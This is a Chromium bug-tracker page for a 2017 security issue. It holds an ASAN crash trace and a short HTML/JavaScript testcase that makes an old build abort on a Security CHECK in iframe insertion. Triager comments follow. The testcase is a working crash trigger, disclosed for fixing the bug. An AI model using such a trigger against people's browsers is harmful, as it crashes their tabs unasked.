Issue metadata
Sign in to add a comment
|
Security: Security CHECK failed: !contentFrame()
Reported by
cloudfuz...@gmail.com,
Jan 8 2017
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
The latest ASAN build of chromium crashes as follows when loading the testcase:
[4678:4678:0108/133101.549313:FATAL:HTMLFrameElementBase.cpp(194)] Security CHECK failed: !contentFrame().
#0 0x56213fed4bb1 __interceptor_backtrace
#1 0x562146efd020 base::debug::StackTrace::StackTrace()
#2 0x562146f5b82c logging::LogMessage::~LogMessage()
#3 0x562151942398 blink::HTMLFrameElementBase::didNotifySubtreeInsertionsToDocument()
#4 0x562150c3950d blink::ContainerNode::insertNodeVector<>()
#5 0x562150c349e0 blink::ContainerNode::appendChild()
#6 0x562150eba875 blink::Node::appendChild()
#7 0x56214fd0a67b blink::NodeV8Internal::appendChildMethodCallbackForMainWorld()
#8 0x562140eb7fac v8::internal::FunctionCallbackArguments::Call()
#9 0x56214112cb9d v8::internal::(anonymous namespace)::HandleApiCallHelper<>()
#10 0x562141129753 v8::internal::Builtin_Impl_HandleApiCall()
#11 0x7fecb5a04427 <unknown>
Received signal 6
#0 0x56213fed4bb1 __interceptor_backtrace
#1 0x562146efbf3b base::debug::(anonymous namespace)::StackDumpSignalHandler()
#2 0x7fee2de803e0 <unknown>
#3 0x7fee2abe2428 gsignal
#4 0x7fee2abe402a abort
#5 0x562146ef888a base::debug::BreakDebugger()
#6 0x562146f5c104 logging::LogMessage::~LogMessage()
#7 0x562151942398 blink::HTMLFrameElementBase::didNotifySubtreeInsertionsToDocument()
#8 0x562150c3950d blink::ContainerNode::insertNodeVector<>()
#9 0x562150c349e0 blink::ContainerNode::appendChild()
#10 0x562150eba875 blink::Node::appendChild()
#11 0x56214fd0a67b blink::NodeV8Internal::appendChildMethodCallbackForMainWorld()
#12 0x562140eb7fac v8::internal::FunctionCallbackArguments::Call()
#13 0x56214112cb9d v8::internal::(anonymous namespace)::HandleApiCallHelper<>()
#14 0x562141129753 v8::internal::Builtin_Impl_HandleApiCall()
#15 0x7fecb5a04427 <unknown>
r8: 000000008fff6fff r9: 0000000000000000 r10: 0000000000000008 r11: 0000000000000202
r12: 00007fecdbaedae0 r13: 0000000000000000 r14: 00007fecdbaed800 r15: 00007fecdb825820
di: 0000000000001246 si: 0000000000001246 bp: 00007ffd8967d110 bx: 00007ffd8967d120
dx: 0000000000000006 ax: 0000000000000000 cx: 00007fee2abe2428 sp: 00007ffd8967cfd8
ip: 00007fee2abe2428 efl: 0000000000000202 cgf: 0000000000000033 erf: 0000000000000000
trp: 0000000000000000 msk: 0000000000000000 cr2: 0000000000000000
[end of stack trace]
VERSION
Chrome Version: asan-linux-release-434865
REPRODUCTION CASE
<script>
function start() {
o0=window.document;
o51=o0.createElementNS('http://www.w3.org/1999/xhtml','iframe');
o57=o0.createElementNS('http://www.w3.org/1999/xhtml','iframe');
o57.addEventListener('load', f1,false);
try{while(window.top.document.removeChild(window.top.document.firstChild));;}catch(e){}
o76=window.top.document.implementation.createHTMLDocument();
o76.body.appendChild(o57);
o76.body.appendChild(o51);
window.top.document.appendChild(o76.documentElement);
}
function f1() {
window.top.document.documentElement.appendChild(o51);
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
,
Jan 9 2017
Clusterfuzz says this is flaky. But it looks like this is a relatively new CHECK: https://chromium.googlesource.com/chromium/src/+/baf4f1f0cca9c704ff01de23e9360a1deef00cb4
,
Jan 10 2017
,
Apr 18 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by ClusterFuzz
, Jan 9 2017